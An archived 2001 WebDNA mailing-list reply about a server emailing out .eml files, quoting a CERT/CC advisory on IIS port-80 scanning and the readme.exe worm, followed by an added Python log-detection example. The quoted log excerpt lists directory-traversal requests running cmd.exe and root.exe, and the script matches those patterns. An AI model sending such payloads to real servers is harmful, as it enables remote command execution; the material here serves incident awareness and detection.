Re: .eml files
This WebDNA talk-list message is from 2001
It keeps the original formatting.
On 9/18/01 2:43 PM, Jeff - Sourcestudios.com wrote:

> Our server has been going crazy sending out these .eml files. They seem to be
> all over the place.
>
> Anyone else experiencing this or any knowledge of this?
>
> Running NT 4.0, webcat 4.02rc2

http://vil.mcafee.com/dispVirus.asp?virus_k=99209
http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd

From cert.org:
http://www.cert.org/current/current_activity.html

Increase in Port 80 (HTTP) scanning activity

This morning (September 18th) the CERT/CC started receiving reports of a
massive increase in scanning directed at port 80 (HTTP). Reports indicate
that this scanning activity is attempting to exploit systems previously
compromised by Code Red II and/or the sadmind/IIS worm as well as other
known vulnerabilities in Microsoft Internet Information Server (IIS). Please
see CERT Vulnerability Note VU#111677 for information on the type of
vulnerability being exploited.

The following is a log excerpt of this scanning activity:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

The CERT/CC has also received reports of a possibly new piece of malicious
code named readme.exe being sent via email. Preliminary analysis indicates
that this file may be related to the increase in port 80 scanning activity.

Sites are encouraged to verify the state of security patches on all IIS
servers and email client software. Administrators may also want to add
filters to mail servers to block the readme.exe attachment. In addition,
sites may wish to notify users of the existence of readme.exe and its
potential threat.

Robert Minor
Director of Internet Services
------------------------------------------------------------
Cybermill Communications
http://www.cybermill.com http://www.merchantmaker.com
Providing Ecommerce and interactive website development and
hosting services on Macintosh, Windows NT, Unix, and AS/400.
All your websites are belong to us!
-------------------------------------------------------------
This message is sent to you because you are subscribed to the mailing list .
To unsubscribe, E-mail to:
To switch to the DIGEST mode, E-mail to
Web Archive of this list is at: http://search.smithmicro.com/
Bob Minor
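
An added example, not part of the original message or of the CERT/CC text: one way a defender could flag the request patterns from the log excerpt above when reviewing web server logs. It normalises each logged path (the log's \xNN notation, percent-encoding, backslashes) before matching. The function names, the reason tags and the lax-decoder model used for the \xc0/\xc1 byte pairs are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

HEX_ESCAPE = re.compile(rb"\\x([0-9a-fA-F]{2})")  # the log's \xNN byte notation
OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)   # lead bytes never valid in UTF-8

def _collapse(m):
    # Assumption: model a lax decoder that keeps only the low 6 bits of byte 2.
    return bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)])

def canonical(path, max_rounds=3):
    """Return (normalised path, overlong_seen) for a logged request path."""
    raw = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]),
                         path.encode("latin-1", "replace"))
    for _ in range(max_rounds):          # unwrap nested percent-encoding
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    overlong = OVERLONG.search(raw) is not None
    raw = OVERLONG.sub(_collapse, raw)
    return raw.replace(b"\\", b"/").lower().decode("latin-1"), overlong

def classify(request_line):
    """Return the set of reasons a logged request line matches the scan."""
    _method, _, target = request_line.partition(" ")
    path, _, _query = target.partition("?")
    canon, overlong = canonical(path)
    segments = [s for s in canon.split("/") if s]
    reasons = set()
    if overlong:
        reasons.add("overlong-utf8")
    if ".." in segments:
        reasons.add("traversal")
    if segments and segments[-1] == "cmd.exe":
        reasons.add("cmd-exec")
    if segments and segments[-1] == "root.exe":  # cmd.exe copy left by Code Red II
        reasons.add("root.exe")
    return reasons

# Sample input: four lines copied from the excerpt above, the last constructed.
SAMPLE = [
    "GET /scripts/root.exe?/c+dir",
    "GET /c/winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir",
    r"GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir",
    "GET /index.html",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(sorted(classify(line)) or "clean", line)
```
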